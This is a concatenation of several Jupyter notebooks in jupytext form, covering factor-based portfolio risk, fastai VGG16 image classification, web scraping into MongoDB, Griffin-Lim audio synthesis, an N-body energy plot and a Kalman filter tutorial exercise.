ax1.set(xlabel='beta')
ax2.set(xlabel='beta')
ax3.set(xlabel='beta')
plt.show()
# -
B.loc[symbols('AAPL'),:]
# ### Summary of the Setup:
# 1. returns of assets in universe: `R`
# 2. fundamental factors: `F`
# 3. Exposures of these fundamental factors: `B`
# Currently, the `F` DataFrame contains the return streams for MKT, SMB, and HML, by date.
F.head(3)
# While the `B` DataFrame contains point estimates of the beta exposures **to** MKT, SMB, and HML for every asset in our universe.
B.head(3)
# Now that we have these values, we can start to crack open the variance of any portfolio that contains these assets.
# ### Splitting Variance into Common Factor Risks
#
# The portfolio variance can be represented as:
#
# $$\sigma^2 = \omega BVB^{\top}\omega^{\top} + \omega D\omega^{\top}$$
#
# where:
#
# $$\begin{eqnarray}
# B &=& \text{the matrix of factor exposures of $n$ assets to the factors} \\
# V &=& \text{the covariance matrix of factors} \\
# D &=& \text{the specific variance} \\
# \omega &=& \text{the vector of portfolio weights for $n$ assets}\\
# \omega BVB^{\top}\omega^{\top} &=& \text{common factor variance} \\
# \omega D\omega^{\top} &=& \text{specific variance} \\
# \end{eqnarray}$$
# #### Computing Common Factor and Specific Variance:
#
# Here we build functions to break out the risk in our portfolio. Suppose that our portfolio consists of all stocks in the Q3000US, equally-weighted. Let's have a look at how much of the variance of the returns in this universe are due to common factor risk.
w = np.ones([1,R.shape[1]])/R.shape[1]
# +
def compute_common_factor_variance(factors, factor_exposures, w):
    """Common-factor variance of the portfolio: w B V B' w'.

    factors          : DataFrame (T x k) of factor return streams.
    factor_exposures : DataFrame (n x k) of per-asset factor betas.
    w                : (1 x n) row vector of portfolio weights.
    Returns a (1 x 1) ndarray holding the common-factor variance.
    """
    B = np.asarray(factor_exposures)
    # k x k factor covariance matrix.
    V = np.asarray(factors.cov())
    # Removed unused local `F = np.asarray(factors)` from the original.
    return w.dot(B.dot(V).dot(B.T)).dot(w.T)
common_factor_variance = compute_common_factor_variance(F, B, w)[0][0]
print("Common Factor Variance: {0}".format(common_factor_variance))
# +
def compute_specific_variance(epsilon, w):
    """Specific (idiosyncratic) variance of the portfolio: w D w'.

    D is a diagonal matrix of per-asset residual variances.
    NOTE(review): pandas .var() already uses the sample (ddof=1)
    denominator, so the extra n/(n-1) rescaling looks doubled -- and under
    this notebook's Python 2 kernel `shape[0] / (shape[0]-1)` is integer
    division, which silently evaluates to 1 for n > 1. Confirm intent
    before porting to Python 3, where the factor would actually apply.
    """
    D = np.diag(np.asarray(epsilon.var())) * epsilon.shape[0] / (epsilon.shape[0]-1)
    return w.dot(D).dot(w.T)
specific_variance = compute_specific_variance(epsilon, w)[0][0]
print("Specific Variance: {0}".format(specific_variance))
# -
# In order to actually calculate the percentage of our portfolio variance that is made up of common factor risk, we do the following:
#
#
# $$\frac{\text{common factor variance}}{\text{common factor variance + specific variance}}$$
common_factor_pct = common_factor_variance/(common_factor_variance + specific_variance)*100.0
print("Percentage of Portfolio Variance Due to Common Factor Risk: {0:.2f}%".format(common_factor_pct))
# So we see that if we just take every single security in the Q3000US and equally-weight them, we will end up possessing a portfolio that effectively only contains common risk.
# ### Risk-Constrained Optimization
#
# Currently we are operating with an equal-weighted portfolio. However, we can reapportion those weights in such a way that we minimize the common factor risk illustrated by our common factor exposures. This is a portfolio optimization problem to find the optimal weights.
#
# We define this problem as:
#
# \begin{array}{ll} \mbox{$\text{minimize/maximum}$}_{w} & \text{objective function}\\
# \mbox{subject to} & {\bf 1}^T \omega = 1, \quad f=B^T\omega\\
# & \omega \in {\cal W}, \quad f \in {\cal F},
# \end{array}
#
# where the variable $w$ is the vector of allocations, the variable $f$ is weighted factor exposures, and the variable ${\cal F}$ provides our constraints for $f$. We set ${\cal F}$ as a vector to bound the weighted factor exposures of the porfolio. These constraints allow us to reject weightings that do not fit our criteria. For example, we can set the maximum factor exposures that our portfolios can have by changing the value of ${\cal F}$. A value of $[1,1,1]$ would indicate that we want the maximum factor exposure of the portfolio to each factor to be less than $1$, rejecting any portfolios that do not meet that condition.
#
# We define the objective function as whichever business goal we value highest. This can be something such as maximizing the Sharpe ratio or minimizing the volatility. Ultimately, what we want to solve for in this optimization problem is the weights, $\omega$.
#
# Let's quickly generate some random weights to see how the weighted factor exposures of the portfolio change.
w_0 = np.random.rand(R.shape[1])
w_0 = w_0/np.sum(w_0)
# The variable $f$ contains the weighted factor exposures of our portfolio, with size equal to the number of factors we have. As we change $\omega$, our weights, our weighted exposures, $f$, also change.
f = B.T.dot(w_0)
f
# A concrete example of this can be found [here](http://nbviewer.jupyter.org/github/cvxgrp/cvx_short_course/blob/master/applications/portfolio_optimization.ipynb), in the docs for CVXPY.
# ### Performance Attribution
#
# Let's take a sample algo from the Quantopian forums and attribute its performance using pyfolio. This should give us an understanding of the specific and common risk associated with the algorithm's return stream.
bt_wsj = get_backtest('59232d19c931f1619e6423c9')
# Now we'll run the algorithm using [Quantopian's built-in risk model](https://www.quantopian.com/posts/new-tool-for-quants-the-quantopian-risk-model) and performance attribution tearsheet. We extend beyond the Fama-French Factors, looking into common factor risk due to sectors and due to particular styles of investment that are common in the market.
bt_wsj.create_perf_attrib_tear_sheet();
# ## References
# * <NAME>., <NAME>. and <NAME>., 2007. *Quantitative equity portfolio management: modern techniques and applications*. CRC Press.
# * <NAME>., 2013. *Inside the Black Box: A Simple Guide to Quantitative and High Frequency Trading*. John Wiley & Sons.
# *This presentation is for informational purposes only and does not constitute an offer to sell, a solicitation to buy, or a recommendation for any security; nor does it constitute an offer to provide investment advisory or other services by Quantopian, Inc. ("Quantopian"). Nothing contained herein constitutes investment advice or offers any opinion with respect to the suitability of any security, and any views expressed herein should not be taken as advice to buy, sell, or hold any security or as an endorsement of any security or company. In preparing the information contained herein, Quantopian, Inc. has not taken into account the investment needs, objectives, and financial circumstances of any particular investor. Any views expressed and data illustrated herein were prepared based upon information, believed to be reliable, available to Quantopian, Inc. at the time of publication. Quantopian makes no guarantees as to their accuracy or completeness. All information is subject to change and may quickly become unreliable for various reasons, including changes in market conditions or economic circumstances.*
|
docs/memo/notebooks/lectures/Factor_Based_Risk_Management/notebook.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3 (FastAI)
# language: python
# name: fastai
# ---
# L1/L2 Code Along IIA: lesson1.vgg
#
# Replicating: https://github.com/fastai/fastai/blob/master/courses/dl1/lesson1-vgg.ipynb
# ## Image Classification w/ Convolutional Neural Networks
# %reload_ext autoreload
# %autoreload 2
# %matplotlib inline
# +
from fastai.imports import *
from fastai.transforms import *
from fastai.conv_learner import *
from fastai.model import *
from fastai.dataset import *
from fastai.sgdr import *
from fastai.plots import *
# -
PATH = "data/dogscats/"
sz=224          # input image size fed to the network
ARCH = vgg16    # fastai-provided VGG16 architecture
bs = 16         # batch size
# Uncomment if need to reset precomputed activations
# !rm -rf {PATH}tmp
data = ImageClassifierData.from_paths(PATH, bs=bs, tfms=tfms_from_model(ARCH, sz))
learn = ConvLearner.pretrained(ARCH, data, precompute=True)
learn.fit(0.01, 3, cycle_len=1)
# Add data augmentation (side-on flips / zoom) and retrain.
tfms = tfms_from_model(ARCH, sz, aug_tfms=transforms_side_on, max_zoom=1.1)
data = ImageClassifierData.from_paths(PATH, tfms=tfms, bs=bs, num_workers=4)
learn = ConvLearner.pretrained(ARCH, data, precompute=True)
learn.fit(lrs=1e-2, n_cycle=2)
learn.save('vgg16_00') # just in case I run out of memory below
# Turn off precomputed activations so augmentation actually takes effect.
learn.precompute=False
learn.fit(lrs=1e-2, n_cycle=1, cycle_len=1)
learn.save('vgg16_01')
# Unfreeze all layers for full fine-tuning.
learn.unfreeze()
learn.data.bs = 4 # training ConvNets takes lots of Memory, cut down bs to prevent crashes
# Differential learning rates: earlier layer groups get smaller updates.
lr = np.array([1e-4, 1e-3, 1e-2])
learn.fit(lrs=lr, n_cycle=1, cycle_len=1)
learn.save('vgg16_02')
# NOTE(review): lr_find()'s result is never inspected before the next fit.
learn.lr_find()
learn.fit(lrs=lr, n_cycle=3, cycle_len=1, cycle_mult=2)
learn.save('vgg16_03')
learn.fit(lrs=lr, n_cycle=3, cycle_len=3)
learn.save('vgg16_04')
# ### Testing
#
# Above training stopped midway through 8th epoch. Time for testing:
# +
# %reload_ext autoreload
# %autoreload 2
# %matplotlib inline
from fastai.imports import *
from fastai.transforms import *
from fastai.conv_learner import *
from fastai.model import *
from fastai.dataset import *
from fastai.sgdr import *
from fastai.plots import *
# -
# Re-establish the training-time configuration so saved weights line up.
PATH = "data/dogscats/"
sz=224
ARCH = vgg16
bs = 16

# Same data object as in training, now with the Kaggle test set attached.
data = ImageClassifierData.from_paths(PATH, bs=bs, tfms=tfms_from_model(ARCH, sz),
test_name = 'test1')
# No reason to precompute activations as I'm running a single prediction run on the test set
# Also, since I trained all ConvLayers earlier... how will it know how to compute
# the activations if I haven't loaded the weights yet?
learn = ConvLearner.pretrained(ARCH, data, precompute=False)
# the test data set
len(learn.data.test_dl.dataset)

# Restore the fully fine-tuned weights saved at the end of training.
learn.load('vgg16_04')
# This took about 32 minutes
log_preds = learn.TTA(n_aug=4, is_test=True)[0]

# #### Experimenting with saving as Pandas.DataFrame.to_feather(.)
# NOTE(review): the column names assume class order ['dog', 'cat'], but
# data.classes is normally alphabetical ('cats' before 'dogs') — verify;
# the label flip discovered later in this notebook suggests this is wrong.
log_preds_df = pd.DataFrame(log_preds, columns=['dog','cat'])
log_preds_df.to_feather(PATH + 'results/' + 'log_preds')
# +
# log_preds_df = pd.read_feather(PATH + 'results/' + 'log_preds')
# -

# Convert log-probabilities back to probabilities and take the argmax class.
test_preds = np.exp(log_preds)
ids = [f[6:-4] for f in learn.data.test_dl.dataset.fnames]  # strip 'test1/' prefix and '.jpg'
preds = [np.argmax(pred) for pred in test_preds]
submission = pd.DataFrame({'id': ids, 'label': preds})
# #### Another way to create submission file:
submission = pd.DataFrame(preds)
submission.columns = ['label']
submission.insert(0, 'id', ids)
submission.head()
# #### Creating FileLink:
submission.to_csv(PATH + 'subm/' + 'submission_vgg16_04.gz', compression='gzip', index=False)
FileLink(PATH + 'subm/' + 'submission_vgg16_04.gz')
# ---
# +
# %reload_ext autoreload
# %autoreload 2
# %matplotlib inline
from fastai.imports import *
from fastai.transforms import *
from fastai.conv_learner import *
from fastai.model import *
from fastai.dataset import *
from fastai.sgdr import *
from fastai.plots import *
# -
# Fresh session: rebuild data/learner, reload weights, then evaluate and
# regenerate the submission from the feather-cached log-probabilities.
PATH = "data/dogscats/"
sz=224
ARCH = vgg16
bs = 16
data = ImageClassifierData.from_paths(PATH, bs=bs, tfms=tfms_from_model(ARCH, sz),
test_name = 'test1')
# No reason to precompute activations as I'm running a single prediction run on the test set
# Also, since I trained all ConvLayers earlier... how will it know how to compute
# the activations if I haven't loaded the weights yet?
learn = ConvLearner.pretrained(ARCH, data, precompute=False)
learn.load('vgg16_04')

# Validation-set accuracy with test-time augmentation.
log_preds, y = learn.TTA()
accuracy(log_preds, y)

# Reload the cached test-set log-probabilities saved earlier.
df = pd.read_feather(PATH + 'results/' + 'log_preds')
df.head()

# Re-pair the two class columns row-wise, exponentiate, and take argmax.
preds = np.array(list(zip(*(df['dog'],df['cat']))))
preds = np.exp(preds)
preds = [np.argmax(pred) for pred in preds]
# NOTE(review): this label flip (argmax 0 -> label 1) compensates for the
# suspected wrong column order when the feather file was written — confirm
# against data.classes before trusting these labels.
new_preds = [int(i==0) for i in preds]
new_preds[:10]
ids = [f[6:-4] for f in learn.data.test_dl.dataset.fnames]
submission = pd.DataFrame({'id': ids, 'label': new_preds})
submission.to_csv(PATH + 'subm/' + 'submission_vgg16_04_wtf.gz', compression='gzip', index=False)
FileLink(PATH + 'subm/' + 'submission_vgg16_04_wtf.gz')

# Second variant: submit clipped probabilities instead of hard labels
# (log-loss scores much better with probabilities clipped to [0.05, 0.95]).
log_preds_df = np.array(list(zip(*(df['dog'],df['cat']))))
test_preds = np.exp(log_preds_df)
test_preds = np.clip(test_preds, 0.05, 0.95)
data.classes
labels = test_preds[:,1]
labels[:10]
learn.data.test_dl.dataset.fnames
ids = [f[6:-4] for f in learn.data.test_dl.dataset.fnames]
submission = pd.DataFrame({'id': ids, 'label': labels})
submission.to_csv(PATH + 'subm/' + 'submission_vgg16_04_omg.csv.gz', compression='gzip', index=False)
FileLink(PATH + 'subm/' + 'submission_vgg16_04_omg.csv.gz')
# ---
#
# This model took roughly 10 ~ 14 hours to train on a GTX870M / Intel Core i7 machine. It achieved a score of `0.07389` when clipped to [0.05:0.95] @ 201/1314 place.
|
FADL1/vgg16_lesson1.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 2
# language: python
# name: python2
# ---
# Fetch a department page and wrap it in a Scrapy TextResponse so XPath
# selectors can be used interactively, outside a running spider.
# NOTE: this notebook runs on a Python 2 kernel (goose is Python 2 only).
import requests
from scrapy.http import TextResponse
r = requests.get('http://www.concordia.ca/artsci/biology/programs/undergraduate.html')
response = TextResponse(r.url, body=r.text, encoding='utf-8')
# +
import re

# Extract all visible text, excluding boilerplate/navigation containers and
# any text nested inside links, scripts, headers, styles or footers.
# NOTE(review): the 'c-topnav top-links' predicate appears twice — harmless
# duplication, presumably a copy-paste leftover.
# body = response.xpath("//*[not(contains (@class, 'visible-print'))]")
body = response.xpath("""//text()[normalize-space()
and not(ancestor::div[contains (@class, 'c-back-to-top')])
and not(ancestor::div[contains (@class, 'c-topnav top-links')])
and not(ancestor::div[contains (@class, 'c-topnav top-links')])
and not(ancestor::div[contains (@class, 'quick-links link-list')])
and not(ancestor::div[contains (@class, 'parbase emergency-alert')])
and not(ancestor::div[contains (@class, 'visible-print')])
and not(ancestor::a |
ancestor::script |
ancestor::header |
ancestor::noscript |
ancestor::style |
ancestor::footer)]""").extract()
# Collapse the text-node list into one whitespace-normalized string.
body = " ".join(body)
body = re.sub('\s+',' ', body)
body
# description = response.xpath("//meta[@name='description']").extract_first()
# description = response.xpath("//meta/@content").extract()
# title = response.css('title::text').extract_first()
# -

# Collect every outgoing link on the page.
hrefs = response.xpath('//a/@href').extract()
hrefs

# Spider names for the Arts & Science departments we plan to crawl.
spiders = [
    "artsci_biology",
    "artsci_chemistry",
    "artsci_exercise_science",
    "artsci_geography",
    "artsci_math",
    "artsci_physics",
    "artsci_psychology",
    "artsci_science_college"
]

# Alternative extraction using Goose's article extractor for comparison.
from goose import Goose
g = Goose()
article = g.extract(url="http://www.concordia.ca/artsci/biology.html")
article.cleaned_text
|
web_crawler/playbook_scrap.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# Dependencies
from bs4 import BeautifulSoup
import requests
import pymongo
# Initialize PyMongo to work with MongoDBs (local default port)
conn = 'mongodb://localhost:27017'
client = pymongo.MongoClient(conn)

# Define database and collection (created lazily on first insert)
db = client.commerce_db
collection = db.items

# +
# URL of page to be scraped
url = 'https://webscraper.io/test-sites/e-commerce/allinone/computers/laptops'

# Retrieve page with the requests module
response = requests.get(url)

# Create BeautifulSoup object; parse with 'lxml'
soup = BeautifulSoup(response.text, 'lxml')

# +
# Examine the results, then determine element that contains sought info
# results are returned as an iterable list
results = soup.find_all('div', class_='caption')

# Loop through returned results; one MongoDB document per product listing
for result in results:
    # Error handling
    try:
        # Identify and return title of listing
        title = result.find('a', class_='title').text
        # Identify and return price of listing
        price = result.find('h4', class_='price').text
        # Identify and return link to listing
        link = result.a['href']

        # Run only if title, price, and link are available
        if (title and price and link):
            # Print results
            print('-------------')
            print(title)
            print(price)
            print(link)

            # Dictionary to be inserted as a MongoDB document
            post = {
                'title': title,
                'price': price,
                'url': link
            }
            collection.insert_one(post)

    # NOTE(review): broad catch is deliberate in this teaching example —
    # an AttributeError from a missing tag simply skips that listing.
    except Exception as e:
        print(e)

# +
# Display items in MongoDB collection
listings = db.items.find()
for listing in listings:
    print(listing)
# -
|
01-Lesson-Plans/12-Web-Scraping-and-Document-Databases/2/Activities/05-Ins_MongoScraping/Solved/Ins_MongoScraping.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import numpy as np
from datasets.audio import *
import os
from hparams import hparams
def _path_tag(npy_path):
    """Flatten a spectrogram path into a tag safe for output file names.

    e.g. 'training_data/mels/mel-LJ001-0005.npy' ->
         'training_data_mels_mel-LJ001-0005'
    """
    return npy_path.replace('/', '_').replace('\\', '_').replace('.npy', '')


# Select which mel to invert: a training-time prediction dump by step
# number, or (as currently overridden below) a ground-truth training mel.
n_sample = 0  # Change n_steps here
mel_folder = 'logs-Tacotron/mel-spectrograms'  # Or change file path
mel_file = 'mel-prediction-step-{}.npy'.format(n_sample)  # Or file name (for other generated mels)
out_dir = 'wav_out'

os.makedirs(out_dir, exist_ok=True)

#mel_file = os.path.join(mel_folder, mel_file)
mel_file = 'training_data/mels/mel-LJ001-0005.npy'
mel_spectro = np.load(mel_file)
mel_spectro.shape
# -

# Invert the mel spectrogram (Griffin-Lim under the hood) and save audio.
wav = inv_mel_spectrogram(mel_spectro.T, hparams)
# save the wav under test_<folder>_<file>
save_wav(wav, os.path.join(out_dir, 'test_mel_{}.wav'.format(_path_tag(mel_file))),
         sr=hparams.sample_rate)
# +
from tacotron.utils.plot import *

plot_spectrogram(mel_spectro, path=os.path.join(out_dir, 'test_mel_{}.png'.format(_path_tag(mel_file))))
# -

# Same round-trip for the matching linear (full-band) spectrogram.
lin_file = 'training_data/linear/linear-LJ001-0005.npy'
lin_spectro = np.load(lin_file)
lin_spectro.shape

wav = inv_linear_spectrogram(lin_spectro.T, hparams)
# Fix: linear outputs were previously (mis)named after mel_file.
save_wav(wav, os.path.join(out_dir, 'test_linear_{}.wav'.format(_path_tag(lin_file))),
         sr=hparams.sample_rate)
plot_spectrogram(lin_spectro, path=os.path.join(out_dir, 'test_linear_{}.png'.format(_path_tag(lin_file))),
                 auto_aspect=True)
|
griffin_lim_synthesis_tool.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
# Load per-run energy logs (columns: particle count, total energy).
euler = np.array(pd.read_csv('energy_euler.csv', sep=','))
# NOTE(review): barneshut and ms are loaded but never plotted below —
# presumably intended for later cells; confirm before removing.
barneshut = np.array(pd.read_csv('energy_barneshut.csv', sep=','))
ms = np.array(pd.read_csv('energy_ms.csv', sep=','))

# Particle counts present in the logs; one box per count.
particle_counts = [100, 200, 500, 1000, 1500, 2000, 3000, 5000]

fig = plt.figure()
ax1 = fig.add_subplot(111)
#ax1.boxplot()
ax1.set_xticklabels(particle_counts)
# NOTE(review): 8 labels but only 3 tick positions — matplotlib pairs them
# in order and drops the rest; looks like a leftover from an older layout.
# TODO confirm the intended tick placement.
ax1.set_xticks([1.5, 4.5, 7.5])

# Box-plot the Euler energies grouped by particle count, at consecutive
# integer positions along the x-axis.
for position, count in enumerate(particle_counts, start=1):
    ax1.boxplot(euler[euler[:, 0] == count][:, 1], positions=[position], labels=[count])
    print("somelist", [count])

plt.show()
|
analysis/.ipynb_checkpoints/energyConservation-checkpoint.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] colab_type="text" id="view-in-github"
# <a href="https://colab.research.google.com/github/NeuromatchAcademy/course-content/blob/master/tutorials/W2D3_DecisionMaking/student/W2D3_Tutorial3.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# + [markdown] colab_type="text"
# # Neuromatch Academy: Week 3, Day 2, Tutorial 3
# # Linear Dynamical Systems & The Kalman Filter
# __Content creators:__ <NAME> and <NAME>
#
# __Content reviewers:__ <NAME>, <NAME>, and <NAME>
#
# **Useful reference:**
# - <NAME> (1998): A unifying review of linear Gaussian Models
# - Bishop (2006): Pattern Recognition and Machine Learning
#
# **Acknowledgement**
#
# This tutorial is in part based on code originally created by <NAME> for Dr. <NAME>'s *Probabilistic Time Series* class at the Center for Data Science, New York University
# + cellView="form" colab={"base_uri": "https://localhost:8080/", "height": 519} colab_type="code" outputId="d75a9b05-d43e-4a8a-968e-6f5c0ecdddae"
#@title Video 1: Introduction
# Insert the ID of the corresponding youtube video
from IPython.display import YouTubeVideo
video = YouTubeVideo(id="6f_51L3i5aQ", width=854, height=480, fs=1)
print("Video available at https://youtu.be/" + video.id)
video
# + [markdown] colab_type="text"
# ---
# # Tutorial Objectives
#
# In the previous tutorials we looked at inferring discrete latent states that give rise to our measurements. In this tutorial, we will learn how to infer a latent model when our states are continuous. Particular attention is paid to the Kalman filter and its mathematical foundation.
#
# In this tutorial, you will:
# * Review linear dynamical systems
# * Learn about and implement the Kalman filter
# * Explore how the Kalman filter can be used to smooth data from an eye-tracking experiment
#
# + colab={} colab_type="code"
# Install PyKalman (https://pykalman.github.io/)
# !pip install pykalman --quiet
# Imports
import numpy as np
import matplotlib.pyplot as plt
import pykalman
from scipy import stats
# + cellView="form" colab={} colab_type="code"
#@title Figure settings
import ipywidgets as widgets # interactive display
# %config InlineBackend.figure_format = 'retina'
plt.style.use("https://raw.githubusercontent.com/NeuromatchAcademy/course-content/master/nma.mplstyle")
# + cellView="form" colab={} colab_type="code"
#@title Data retrieval and loading
import io
import os
import hashlib
import requests
# Download the MIT eye-tracking dataset from OSF (skipped if already cached).
fname = "W2D3_mit_eyetracking_2009.npz"
url = "https://osf.io/jfk8w/download"
expected_md5 = "20c7bc4a6f61f49450997e381cf5e0dd"  # guards against truncated/corrupted downloads

if not os.path.isfile(fname):
    try:
        r = requests.get(url)
    except requests.ConnectionError:
        print("!!! Failed to download data !!!")
    else:
        if r.status_code != requests.codes.ok:
            print("!!! Failed to download data !!!")
        elif hashlib.md5(r.content).hexdigest() != expected_md5:
            print("!!! Data download appears corrupted !!!")
        else:
            # All checks passed: persist the archive to the working directory.
            with open(fname, "wb") as fid:
                fid.write(r.content)
def load_eyetracking_data(data_fname=fname):
    """Read the cached MIT eye-tracking archive.

    Args:
      data_fname (str): path to the .npz archive (defaults to the file
        downloaded by the cell above).

    Returns:
      tuple: (subjects, images) — per-subject gaze arrays and the decoded
        stimulus images.
    """
    with np.load(data_fname, allow_pickle=True) as dobj:
        archive = dict(**dobj)

    # Stimuli are stored as raw JPEG bytes; decode each into a pixel array.
    stimuli = []
    for raw in archive['stimuli']:
        stimuli.append(plt.imread(io.BytesIO(raw), format='JPG'))

    return archive['subjects'], stimuli
# + cellView="form" colab={} colab_type="code"
#@title Helper functions
np.set_printoptions(precision=3)
def plot_kalman(state, observation, estimate=None, label='filter', color='r-',
                title='LDS', axes=None):
    """Draw a 2-D latent trajectory, its observations and (optionally) an
    estimate on two panels: trajectory (left) and correlation (right).

    Returns the pair of axes so further traces can be layered on top by
    passing them back in via `axes`.
    """
    if axes is not None:
        left_ax, right_ax = axes
    else:
        # Fresh figure: draw the ground-truth trajectory and raw data once.
        fig, (left_ax, right_ax) = plt.subplots(ncols=2, figsize=(16, 6))
        left_ax.plot(state[:, 0], state[:, 1], 'g-', label='true latent')
        left_ax.plot(observation[:, 0], observation[:, 1], 'k.', label='data')

    if estimate is not None:
        left_ax.plot(estimate[:, 0], estimate[:, 1], color=color, label=label)
    left_ax.set(title=title, xlabel='X position', ylabel='Y position')
    left_ax.legend()

    if estimate is None:
        # No estimate yet: show observed vs. latent values per dimension.
        right_ax.plot(state[:, 0], observation[:, 0], '.k', label='dim 1')
        right_ax.plot(state[:, 1], observation[:, 1], '.', color='grey',
                      label='dim 2')
        right_ax.set(title='correlation', xlabel='latent', ylabel='observed')
    else:
        # With an estimate: show estimated vs. true latent per dimension.
        right_ax.plot(state[:, 0], estimate[:, 0], '.', color=color,
                      label='latent dim 1')
        right_ax.plot(state[:, 1], estimate[:, 1], 'x', color=color,
                      label='latent dim 2')
        right_ax.set(title='correlation',
                     xlabel='real latent',
                     ylabel='estimated latent')
    right_ax.legend()

    return left_ax, right_ax
def plot_gaze_data(data, img=None, ax=None):
    """Scatter gaze samples, optionally over the stimulus image.

    When an image is supplied the y-axis is flipped so pixel row 0 sits at
    the top, matching image coordinates. Returns the axes used.
    """
    if ax is None:
        _, ax = plt.subplots(figsize=(8, 6))

    if img is None:
        xlim = ylim = None
    else:
        ax.imshow(img, aspect='auto')
        ylim = (img.shape[0], 0)
        xlim = (0, img.shape[1])

    ax.scatter(data[:, 0], data[:, 1], c='m', s=100, alpha=0.7)
    ax.set(xlim=xlim, ylim=ylim)
    return ax
def plot_kf_state(kf, data, ax):
    """Smooth `data` with the fitted KalmanFilter and draw the result on
    `ax`, marking gaze start (orange triangle) and end (orange square).

    NOTE: mutates `kf` in place by overwriting its initial_state_mean with
    the first observation (padded with ones for any extra latent dims).
    """
    mu_0 = np.ones(kf.n_dim_state)
    mu_0[:data.shape[1]] = data[0]
    kf.initial_state_mean = mu_0

    # Kalman smoothing (forward-backward pass) over the whole sequence.
    mu, sigma = kf.smooth(data)

    ax.plot(mu[:, 0], mu[:, 1], 'limegreen', linewidth=3, zorder=1)
    ax.scatter(mu[0, 0], mu[0, 1], c='orange', marker='>', s=200, zorder=2)
    ax.scatter(mu[-1, 0], mu[-1, 1], c='orange', marker='s', s=200, zorder=2)
# + [markdown] colab_type="text"
# ---
# # Section 1: Linear Dynamical System (LDS)
# + cellView="form" colab={"base_uri": "https://localhost:8080/", "height": 519} colab_type="code" outputId="b12e11b3-17bc-4177-9cff-55193ef3980f"
#@title Video 2: Linear Dynamical Systems
# Insert the ID of the corresponding youtube video
from IPython.display import YouTubeVideo
video = YouTubeVideo(id="2SWh639YgEg", width=854, height=480, fs=1)
print("Video available at https://youtu.be/" + video.id)
video
# + [markdown] colab_type="text"
# Latent state variable: $$s_t = Fs_{t-1}+\zeta_t$$
#
# Measured/observed variable: $$y_t = Hs_{t}+\eta_t$$
#
# The latent state variable has dimension $D$ and the measured variable dimension $N$, dimensionality reduction here means that $D<N$.
#
# Both latent and measured variable have Gaussian noise terms:
#
# \begin{eqnarray}
# \zeta_t & \sim & N(0, Q) \\
# \eta_t & \sim & N(0, R) \\
# s_0 & \sim & N(\mu_0, \Sigma_0)
# \end{eqnarray}
#
# As a consequence, $s_t$, $y_t$ and their joint distributions are Gaussian so we can easily compute the marginals and conditionals.
#
# Just as in the HMM, the structure is that of a Markov chain where the state at time point $t$ is conditionally independent of previous states given the state at time point $t-1$.
#
# + [markdown] colab_type="text"
# ## Section 1.1: Sampling
#
# The first thing we will investigate is how to generate timecourse samples from a linear dynamical system given its parameters. We will start by defining the following system:
# + colab={} colab_type="code"
# task dimensions
n_dim_state = 2
n_dim_obs = 2

# initialize model parameters
# NOTE(review): 'Q' (state noise) is sized with n_dim_obs while 'H' uses
# n_dim_state; this only works because both are 2 here — worth confirming.
params = {
    'F': 0.5 * np.eye(n_dim_state),  # state transition matrix
    'Q': np.eye(n_dim_obs),  # state noise covariance
    'H': np.eye(n_dim_state),  # observation matrix
    'R': 0.1 * np.eye(n_dim_obs),  # observation noise covariance
    'mu_0': np.zeros(n_dim_state),  # initial state mean
    'sigma_0': 0.1 * np.eye(n_dim_state),  # initial state noise covariance
}
# + [markdown] colab_type="text"
# **Note**: We used a parameter dictionary `params` above. As the number of parameters we need to provide to our functions increases, it can be beneficial to condense them into a data structure like this to clean up the number of inputs we pass in. The trade-off is that we have to know what is in our data structure to use those values, rather than looking at the function signature directly.
# + [markdown] colab_type="text"
# ### Exercise 1: Sampling from a linear dynamical system
#
# In this exercise you will implement the dynamics functions of a linear dynamical system to sample both a latent space trajectory (given parameters set above) and noisy measurements.
#
# + colab={} colab_type="code"
def sample_lds(n_timesteps, params, seed=0):
    """Draw a latent trajectory and noisy observations from a Linear
    Dynamical System (student exercise: the simulation loop is left for
    you to fill in).

    Args:
      n_timesteps (int): number of time steps to simulate
      params (dict): model parameters (F, Q, H, R, mu_0, sigma_0)
      seed (int): random seed for reproducibility

    Returns:
      ndarray, ndarray: the generated state and observation data
    """
    dim_state = params['F'].shape[0]
    dim_obs = params['H'].shape[0]

    # Fix the RNG so repeated calls are reproducible.
    np.random.seed(seed)

    # Pre-draw all process and measurement noise (mean defaults to 0).
    zi = stats.multivariate_normal(cov=params['Q']).rvs(n_timesteps)
    eta = stats.multivariate_normal(cov=params['R']).rvs(n_timesteps)

    # Allocate the output arrays up front.
    state = np.zeros((n_timesteps, dim_state))
    obs = np.zeros((n_timesteps, dim_obs))

    ###################################################################
    ## TODO for students: compute the next state and observation values
    # Fill out function and remove
    raise NotImplementedError("Student excercise: compute the next state and observation values")
    ###################################################################

    # simulate the system
    for t in range(n_timesteps):
        # write the expressions for computing state values given the time step
        if t == 0:
            state[t] = ...
        else:
            state[t] = ...
        # write the expression for computing the observation
        obs[t] = ...

    return state, obs
# Uncomment below to test your function
# state, obs = sample_lds(100, params)
# print('sample at t=3 ', state[3])
# plot_kalman(state, obs, title='sample')
# + [markdown] colab={"base_uri": "https://localhost:8080/", "height": 482} colab_type="text" outputId="d51c1144-ff76-4d24-c06a-02086c19378b"
